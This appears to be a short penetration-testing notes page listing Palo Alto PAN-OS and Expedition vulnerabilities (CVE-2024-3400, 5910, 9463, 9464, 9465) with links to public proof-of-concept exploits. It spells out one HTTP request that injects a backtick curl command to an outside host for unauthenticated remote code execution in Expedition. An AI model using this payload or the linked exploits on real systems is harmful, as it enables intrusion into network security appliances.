Palo Alto

CVE-2024-3400 Palo Alto File Write Exploit

GitHub - ak1t4/CVE-2024-3400: Global Protec Palo Alto File Write ExploitGitHub

GitHub - ihebski/CVE-2024-3400: CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtectGitHub

Palo Alto Networks Expedition

CVE-2024-5910 - Remotely reset the Expedition application admin credentials

Palo Alto Expedition: From N-Day to Full Compromise – Horizon3.aiHorizon3.ai

CVE-2024-9463 - RCE unauthenticated

POST /API/convertCSVtoParquet.php HTTP/1.1         
Host: http://watchTowr.com         
Content-Type: application/x-www-form-urlencoded        
Content-Length: 72        

ram=watchTowr`curl+https://watchTowr.com`

Ref: https://x.com/watchtowrcyber/status/1844306954245767623?t=ibt0GSdt3qTVwHw54pdM1A&s=03

CVE-2024-9464 - Authenticated command injection vulnerability

GitHub - horizon3ai/CVE-2024-9464: Proof of Concept Exploit for CVE-2024-9464GitHub

CVE-2024-9465 - Unauthenticated SQL Injection

GitHub - horizon3ai/CVE-2024-9465: Proof of Concept Exploit for CVE-2024-9465GitHub